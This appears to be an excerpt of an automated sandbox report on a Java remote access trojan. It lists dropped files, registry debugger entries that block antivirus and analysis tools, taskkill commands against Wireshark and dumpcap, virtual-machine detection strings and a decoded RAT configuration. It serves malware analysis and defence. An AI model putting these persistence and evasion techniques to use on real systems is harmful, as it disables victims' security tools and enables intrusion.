        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
        Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

        Boot Survival

        Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GdBgInx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GDScan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKWCtlx64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKTray.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\guardxkickoff_x64.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7CrvSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMain.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7TSMngr.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nnf.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nbrowser.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nfservice.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NS.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acs.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSANHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSSVC.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANNER.EXE debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ScSecSvc.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtSvcHost.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mergecap.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Up.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Medic.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuarScanner.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BullGuardUpdate.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\clamscan.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cis.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPAVServer.exe debugger
        Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVK.exe debugger
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\regedit.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM WIRESHARK.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A00000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM WIRESHARK.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004A44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
        Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exeJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dllJump to dropped file
        Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dllJump to dropped file
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-13352
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeAPI coverage: 1.2 %
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: javaw.exe, 00000006.00000002.2851634120.000000000A398000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A3E5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2845247996.0000000004F2D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Adevicename=microsoft hyper-v virtualization infrastructure driver
        Source: xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JVM version %s (%s, %s)VirtualMachineImpl.cRedefineClassesGetTopThreadGroupsJNI_FALSENewStringUTF;classTrack.csignaturessignature bagDeleteWeakGlobalRefclassTrack tableloaded classesAttempting to insert duplicate classKlassNodesignatureNewWeakGlobalRefloaded classes arraycommonRef.cSetTagFreeing %d (%x)
        Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Ljava/lang/VirtualMachineError;
        Source: java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: org/omg/CORBA/OMGVMCID.classPK
        Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843639949.0000000001614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cjava/lang/VirtualMachineError
        Source: wscript.exe, 00000005.00000003.1666098782.0000000006AF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: java.exe, 00000007.00000002.2845228924.000000000542F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ADeviceName=Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_
        Source: java.exe, 00000002.00000003.1625026729.0000000015352000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1664952445.0000000014EC6000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1670111593.00000000154F2000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1755381709.000000000288D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: java/lang/VirtualMachineError.classPK
        Source: java.exe, 00000007.00000002.2843639949.00000000015EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWN
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004B3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /DeviceName=Microsoft Hyper-V Generation Counter
        Source: java.exe, 00000002.00000002.1635572608.00000000013FB000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2843520810.0000000000D48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
